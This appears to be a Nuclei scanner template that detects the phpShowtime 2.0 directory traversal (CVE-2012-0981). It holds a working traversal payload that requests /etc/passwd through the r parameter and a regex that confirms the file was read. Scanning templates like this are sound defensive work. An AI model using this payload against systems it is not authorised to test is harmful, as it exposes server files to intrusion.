43 lines
1.3 KiB
YAML
43 lines
1.3 KiB
YAML
id: CVE-2012-0981
|
|
|
|
info:
|
|
name: phpShowtime 2.0 - Directory Traversal
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
|
|
remediation: |
|
|
Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/18435
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-0981
|
|
- http://www.exploit-db.com/exploits/18435
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72824
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2012-0981
|
|
cwe-id: CWE-22
|
|
epss-score: 0.04065
|
|
epss-percentile: 0.91092
|
|
cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: kybernetika
|
|
product: phpshowtime
|
|
tags: phpshowtime,edb,cve,cve2012,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|